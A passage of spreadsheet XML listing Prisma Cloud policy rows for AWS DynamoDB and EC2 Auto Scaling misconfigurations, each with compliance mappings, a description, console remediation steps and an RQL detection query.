          <t>aws-dynamodb</t>
        </is>
      </c>
      <c r="K1619" t="inlineStr">
        <is>
          <t>AWS DynamoDB table deletion protection is disabled</t>
        </is>
      </c>
      <c r="L1619" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1619" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1619" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1619" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1619" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1619" t="inlineStr">
        <is>
          <t>C1</t>
        </is>
      </c>
      <c r="R1619" t="inlineStr">
        <is>
          <t>C1.1</t>
        </is>
      </c>
      <c r="S1619" t="inlineStr"/>
      <c r="T1619" t="b">
        <v>0</v>
      </c>
      <c r="U1619" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1619" t="inlineStr">
        <is>
          <t>aws-dynamodb-describe-table</t>
        </is>
      </c>
      <c r="W1619" t="inlineStr">
        <is>
          <t>This policy identifies AWS DynamoDB tables with deletion protection disabled.
DynamoDB is a fully managed NoSQL database that provides a highly reliable, scalable, low-latency database solution for applications that require consistent, single-digit millisecond latency at any scale. Deletion protection feature allows authorised administrators to prevent accidental deletion of DynamoDB tables. Enabling deletion protection helps reduce the risk of data loss, maintain data integrity, ensure compliance, and protect DynamoDB tables across different environments.
It is recommended to enable deletion protection on DynamoDB tables to prevent unintended data loss.</t>
        </is>
      </c>
      <c r="X1619" t="inlineStr">
        <is>
          <t>To enable a Dynamodb table with deletion protection, follow these steps:
1. Sign into the AWS console and navigate to the DynamoDB console.
2. In the navigation pane, under 'Tables', locate the table you want to enable deletion protection for and select it.
3. In the table details page, under the 'Additional settings' tab, go to the 'Deletion protection' section and click on 'Turn on'.
4. Under the confirmation screen, click on 'Confirm'.</t>
        </is>
      </c>
      <c r="Y1619" t="inlineStr"/>
      <c r="Z1619" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-dynamodb-describe-table' AND json.rule = tableStatus equal ignore case ACTIVE and deletionProtectionEnabled is false</t>
        </is>
      </c>
      <c r="AA1619" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1619" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1619" t="inlineStr">
        <is>
          <t>PC-AWS-DYN-1150</t>
        </is>
      </c>
      <c r="AD1619" t="b">
        <v>1</v>
      </c>
      <c r="AE1619" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1619" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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19" t="inlineStr">
        <is>
          <t>93b2372d-222d-476d-a47d-6c4f9d2a4f67</t>
        </is>
      </c>
      <c r="AI1619" t="inlineStr">
        <is>
          <t>8d2d4878-91e0-4a95-b092-271deb114aff</t>
        </is>
      </c>
      <c r="AJ1619" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1619" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, Fedramp (Moderate), Korea – Information Security Management System (ISMS), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev4, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, MLPS 2.0, NIST 800-53 Rev4, ISO/IEC 27018:2019, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1620" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1620" s="2" t="inlineStr"/>
      <c r="D1620" t="inlineStr"/>
      <c r="E1620" t="inlineStr"/>
      <c r="F1620" t="inlineStr"/>
      <c r="G1620" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1620" t="inlineStr">
        <is>
          <t>aws-dynamodb</t>
        </is>
      </c>
      <c r="K1620" t="inlineStr">
        <is>
          <t>AWS DynamoDB encrypted using AWS owned CMK instead of AWS managed CMK</t>
        </is>
      </c>
      <c r="L1620" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1620" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1620" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1620" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1620" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1620" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1620" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1620" t="inlineStr"/>
      <c r="T1620" t="b">
        <v>0</v>
      </c>
      <c r="U1620" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1620" t="inlineStr">
        <is>
          <t>aws-dynamodb-describe-table</t>
        </is>
      </c>
      <c r="W1620" t="inlineStr">
        <is>
          <t>This policy identifies the DynamoDB tables that use AWS owned CMK (default ) instead of AWS managed CMK (KMS ) to encrypt data. AWS managed CMK provide additional features such as the ability to view the CMK and key policy, and audit the encryption and decryption of DynamoDB tables.</t>
        </is>
      </c>
      <c r="X1620" t="inlineStr">
        <is>
          <t>1. Sign in to AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to 'DynamoDB' dashboard
4. Select the reported table from the list of DynamoDB tables
5. In 'Overview' tab, go to 'Table Details' section
6. Click on the 'Manage Encryption' link available for 'Encryption Type'
7. On 'Manage Encryption' pop up window, Select 'KMS' as the encryption type. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-52
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-52</t>
        </is>
      </c>
      <c r="Y1620" t="inlineStr"/>
      <c r="Z1620" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dynamodb-describe-table' AND json.rule =  'ssedescription does not exist or (ssedescription exists and ssedescription.ssetype == AES256)'
{"category":"General","resourceTypes":["aws_dynamodb_table"]}</t>
        </is>
      </c>
      <c r="AA1620" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1620" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1620" t="inlineStr">
        <is>
          <t>PC-AWS-DYN-365-CKV_AWS_119</t>
        </is>
      </c>
      <c r="AD1620" t="b">
        <v>1</v>
      </c>
      <c r="AE1620" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1620" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>e1322a56-1172-4034-a793-300c062b66d2</t>
        </is>
      </c>
      <c r="AI1620" t="inlineStr">
        <is>
          <t>458c6ad0-ed21-4a99-872a-431ef81deb05</t>
        </is>
      </c>
      <c r="AJ1620" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1620" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" t="inlineStr">
        <is>
          <t>ITSG-33, CSA CCM v4.0.12, SOC 2, ISO/IEC 27001:2022, SOC 2, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, DORA</t>
        </is>
      </c>
      <c r="B1621" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1621" s="2" t="inlineStr"/>
      <c r="D1621" t="inlineStr"/>
      <c r="E1621" t="inlineStr"/>
      <c r="F1621" t="inlineStr"/>
      <c r="G1621" t="b">
        <v>1</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1621" t="inlineStr">
        <is>
          <t>aws-dynamodb</t>
        </is>
      </c>
      <c r="K1621" t="inlineStr">
        <is>
          <t>AWS DynamoDB table point-in-time recovery (PITR) disabled</t>
        </is>
      </c>
      <c r="L1621" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1621" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1621" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1621" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1621" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1621" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1621" t="inlineStr">
        <is>
          <t>Article 11, Response and recovery</t>
        </is>
      </c>
      <c r="S1621" t="inlineStr"/>
      <c r="T1621" t="b">
        <v>0</v>
      </c>
      <c r="U1621" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1621" t="inlineStr">
        <is>
          <t>aws-dynamodb-describe-table</t>
        </is>
      </c>
      <c r="W1621" t="inlineStr">
        <is>
          <t>This policy identifies AWS DynamoDB tables that does not have point-in-time recovery (backup) enabled.
AWS DynamoDB enables you to back up your table data continuously by using point-in-time recovery (PITR) with per-second granularity. This helps in protecting your data against accidental write or delete operations.
It is recommended to enable point-in-time recovery functionality on the DynamoDB table to protect data.</t>
        </is>
      </c>
      <c r="X1621" t="inlineStr">
        <is>
          <t>To enable Point-in-Time Recovery (PITR) for a DynamoDB table, you can follow these steps:
1. Sign in to the AWS Management Console.
2. Navigate to the DynamoDB service.
3. Click on the 'Tables' in the left navigation pane.
4. Select the table you want to enable Point-in-Time Recover (PITR) for.
5. Switch to the 'Backups' tab and click on 'Edit' next to Point-in-time recovery.
6. Click on the 'Turn on point-in-time recovery' check box and Click on 'Save changes'.</t>
        </is>
      </c>
      <c r="Y1621" t="inlineStr"/>
      <c r="Z1621" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-dynamodb-describe-table' AND json.rule = tableStatus equal ignore case ACTIVE AND continuousBackupsDescription.pointInTimeRecoveryDescription.pointInTimeRecoveryStatus does not equal ENABLED</t>
        </is>
      </c>
      <c r="AA1621" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1621" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1621" t="inlineStr">
        <is>
          <t>PC-AWS-DYN-1135</t>
        </is>
      </c>
      <c r="AD1621" t="b">
        <v>1</v>
      </c>
      <c r="AE1621" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1621" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>facc5782-011c-4f1c-adea-f38c08962f5c</t>
        </is>
      </c>
      <c r="AI1621" t="inlineStr">
        <is>
          <t>8e50d036-530e-4377-8270-ab315cc7a1a6</t>
        </is>
      </c>
      <c r="AJ1621" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1621" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" t="inlineStr">
        <is>
          <t>NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ITSG-33, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B1622" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1622" s="2" t="inlineStr"/>
      <c r="D1622" t="inlineStr"/>
      <c r="E1622" t="inlineStr"/>
      <c r="F1622" t="inlineStr"/>
      <c r="G1622" t="b">
        <v>1</v>
      </c>
      <c r="H16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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1622" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1622" t="inlineStr">
        <is>
          <t>AWS Auto Scaling group launch configuration configured with Instance Metadata Service hop count greater than 1</t>
        </is>
      </c>
      <c r="L1622" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1622" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1622" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1622" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1622" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1622" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R1622" t="inlineStr">
        <is>
          <t>CM-02-00 : Baseline Configuration</t>
        </is>
      </c>
      <c r="S1622" t="inlineStr"/>
      <c r="T1622" t="b">
        <v>0</v>
      </c>
      <c r="U1622" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1622" t="inlineStr">
        <is>
          <t>aws-ec2-autoscaling-launch-configuration</t>
        </is>
      </c>
      <c r="W1622" t="inlineStr">
        <is>
          <t>This policy identifies the autoscaling group launch configuration where the Instance Metadata Service network hops count is set to greater than 1. A launch configuration is an instance configuration template that an Auto Scaling group uses to launch EC2 instances. With the metadata response hop limit count for the IMDS greater than 1, the PUT response that contains the secret token can travel outside the EC2 instance. Only metadata with a limited hop count for all your EC2 instances is recommended.</t>
        </is>
      </c>
      <c r="X1622" t="inlineStr">
        <is>
          <t>You cannot modify a launch configuration after you create it. To change the launch configuration for an Auto Scaling group, use an existing launch configuration as the basis for a new launch configuration with IMDS with a hop count equal to 1.
To update the Auto Scaling group to use the new launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration, choose Actions, then click 'Copy launch configuration'. This sets up a new launch configuration with the same options as the original, but with 'Copy' added to the name.
4. On the 'Create launch configuration' page, expand 'Advanced details' under 'Additional Configuration - optional'.
5. Under the 'Advanced details', go to the 'Metadata response hop limit' section.
6. Edit the text box and set the value to 1.
7. When you have finished, click on the 'Create launch configuration' button at the bottom of the page.
8. On the navigation pane, under Auto Scaling, choose Auto Scaling Groups.
9. Select the check box next to the Auto Scaling group.
10. A split pane opens up at the bottom part of the page, showing information about the group that's selected.
11. On the Details tab, click on the 'Edit' button adjacent to the 'Launch configuration' option.
12. Under the 'Launch configuration' dropdown, select the newly created launch configuration.
13. When you have finished changing your launch configuration, click on the 'Update' button at the bottom of the page.
After you change the launch configuration for an Auto Scaling group, any new instances are launched with the new configuration options. Existing instances are not affected. To update existing instances, 
1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from the following URL:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-IMDS-existing-instances.html
To delete the reported Auto Scaling group launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration, choose Actions, then click 'Delete launch configuration'.
4. Click on the 'Delete' button to delete the autoscaling group launch configuration. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-341
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-341</t>
        </is>
      </c>
      <c r="Y1622" t="inlineStr"/>
      <c r="Z1622" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-autoscaling-launch-configuration' AND json.rule = metadataOptions.httpEndpoint exists and metadataOptions.httpEndpoint equals "enabled" and metadataOptions.httpPutResponseHopLimit greater than 1 as X; config from cloud.resource where api.name = 'aws-describe-auto-scaling-groups' as Y; filter ' $.X.launchConfigurationName equal ignore case $.Y.launchConfigurationName'; show X;
{"category":"General","resourceTypes":["aws_launch_configuration","aws_launch_template"]}</t>
        </is>
      </c>
      <c r="AA1622" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1622" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1622" t="inlineStr">
        <is>
          <t>PC-AWS-ASG-1053-CKV_AWS_341</t>
        </is>
      </c>
      <c r="AD1622" t="b">
        <v>1</v>
      </c>
      <c r="AE1622" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1622" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>897624ae-ff31-4270-bc71-1c8a36d84427</t>
        </is>
      </c>
      <c r="AI1622" t="inlineStr">
        <is>
          <t>d9b2ff26-a1b3-49a7-885a-dade1183d193</t>
        </is>
      </c>
      <c r="AJ1622" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1622" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, ITSG-33, HITRUST CSF v.11.2.0, SOC 2, Microsoft Cloud Security Benchmark v1, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1623" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1623" s="2" t="inlineStr"/>
      <c r="D1623" t="inlineStr"/>
      <c r="E1623" t="inlineStr"/>
      <c r="F1623" t="inlineStr"/>
      <c r="G1623" t="b">
        <v>1</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1623" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1623" t="inlineStr">
        <is>
          <t>AWS EC2 Auto Scaling Launch Configuration is not using encrypted EBS volumes</t>
        </is>
      </c>
      <c r="L1623" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1623" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1623" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1623" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1623" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1623" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1623" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1623" t="inlineStr"/>
      <c r="T1623" t="b">
        <v>0</v>
      </c>
      <c r="U1623" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1623" t="inlineStr">
        <is>
          <t>aws-ec2-autoscaling-launch-configuration</t>
        </is>
      </c>
      <c r="W1623" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 Auto Scaling Launch Configurations that are not using encrypted EBS volumes.
A launch configuration defines an instance configuration template that an Auto Scaling group uses to launch EC2 instances. Amazon Elastic Block Store (EBS) volumes allow you to create encrypted launch configurations when creating EC2 instances and auto scaling groups. When the entire EBS volume is encrypted, data stored at rest, in-transit, and snapshots are encrypted. This protects the data from unauthorized access.
As a security best practice for data protection, enable encryption for all EBS volumes at auto scaling launch configuration.</t>
        </is>
      </c>
      <c r="X1623" t="inlineStr">
        <is>
          <t>Once Auto Scaling Launch Configuration is created you can not modify the encryption for the EBS volumes. To reslove this alert you need copy the reported launch configuration, create new launch template using copied launch configuration data and select the encryption option for EBS vloumes. Later delete the reported launch configuration.
To create a new launch template,
1. Log in to AWS console
2. Navigate to the Amazon EC2 dashboard
3. Under 'Auto Scaling' section, select the 'Auto Scaling groups'
4. Click on 'Launch Templates'
5. On 'Launch Templates' page, click on 'Create launch template'
6. Create new lauch template by mentioning all data same as reported launch configuration.
7. Under 'Storage (volumes)', make sure 'Encrypted' set for all EBS volumes you added. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-13
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-13</t>
        </is>
      </c>
      <c r="Y1623" t="inlineStr"/>
      <c r="Z1623" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-autoscaling-launch-configuration' AND json.rule = blockDeviceMappings[*].ebs exists AND blockDeviceMappings[?any(ebs.encrypted is false)] exists
{"category":"General","resourceTypes":["aws_instance","aws_launch_configuration"]}</t>
        </is>
      </c>
      <c r="AA1623" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1623" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1623" t="inlineStr">
        <is>
          <t>PC-AWS-ASG-1138-CKV_AWS_8</t>
        </is>
      </c>
      <c r="AD1623" t="b">
        <v>1</v>
      </c>
      <c r="AE1623" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1623" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>d4cb69d1-c09d-4b7e-beb0-8c43adad117d</t>
        </is>
      </c>
      <c r="AI1623" t="inlineStr">
        <is>
          <t>b22e16a9-69a5-4d5b-b59c-4dc34fcd9d57</t>
        </is>
      </c>
      <c r="AJ1623" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1623" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" t="inlineStr">
        <is>
          <t>NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ITSG-33, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 2, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B1624" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1624" s="2" t="inlineStr"/>
      <c r="D1624" t="n">
        <v>0</v>
      </c>
      <c r="E1624" t="n">
        <v>7</v>
      </c>
      <c r="F1624" t="n">
        <v>0</v>
      </c>
      <c r="G1624" t="b">
        <v>1</v>
      </c>
      <c r="H16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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1624" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1624" t="inlineStr">
        <is>
          <t>AWS Auto Scaling group launch configuration not configured with Instance Metadata Service v2 (IMDSv2)</t>
        </is>
      </c>
      <c r="L1624" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1624" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1624" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1624" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1624" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1624" t="inlineStr">
        <is>
          <t>Control 7</t>
        </is>
      </c>
      <c r="R1624" t="inlineStr">
        <is>
          <t>Safeguard 7.1 : Establish and Maintain a Vulnerability Management Process</t>
        </is>
      </c>
      <c r="S1624" t="inlineStr"/>
      <c r="T1624" t="b">
        <v>0</v>
      </c>
      <c r="U1624" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1624" t="inlineStr">
        <is>
          <t>aws-ec2-autoscaling-launch-configuration</t>
        </is>
      </c>
      <c r="W1624" t="inlineStr">
        <is>
          <t>This policy identifies the autoscaling group launch configuration where IMDSv2 is set to optional. A launch configuration is an instance configuration template that an Auto Scaling group uses to launch EC2 instances. With IMDSv2, every request is now protected by session authentication. Version 2 of the IMDS adds new protections that weren't available in IMDSv1 to further safeguard your EC2 instances created by the autoscaling group. It is recommended to use only IMDSv2 for all your EC2 instances.</t>
        </is>
      </c>
      <c r="X1624" t="inlineStr">
        <is>
          <t>You cannot modify a launch configuration after you create it. To change the launch configuration for an Auto Scaling group, use an existing launch configuration as the basis for a new launch configuration with IMDSv2 enabled.
To update the Auto Scaling group to use the new launch configuration follow the steps below:
1. Open the Amazon EC2 console.
2. On the left navigation pane, under 'Auto Scaling', choose 'Auto Scaling Groups' and Choose 'Launch configurations' near the top of the page.
3. Select the reported launch configuration and choose Actions, then click 'Copy launch configuration'. This sets up a new launch configuration with the same options as the original, but with 'Copy' added to the name.
4. On the 'Create launch configuration' page, expand 'Advanced details' under 'Additional Configuration - optional'.
5. Under the 'Advanced details', go to the 'Metadata version' section.
6. Select 'V2 only (token required)' option.
7. When you have finished, click on the 'Create launch configuration' button at the bottom of the page.
8. On the navigation pane, under Auto Scaling, choose Auto Scaling Groups.
9. Select the check box next to the Auto Scaling group.
10. A split pane opens up at the bottom part of the page, showing information about the group that's selected.
11. On the Details tab, click on the 'Edit' button adjacent to the 'Launch configuration' option.
12. Under the 'Launch configuration' dropdown, select the newly created launch configuration.
13. When you have finished changing your launch configuration, click on the 'Update' button at the bottom of the page.
After you change the launch configuration for an Auto Scaling group, any new instances are launched with the new configuration options. Existing instances are not affected. To update existing instances,
1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated.
3. Refer 'Configure instance metadata options for existing instances' section from the following URL: 
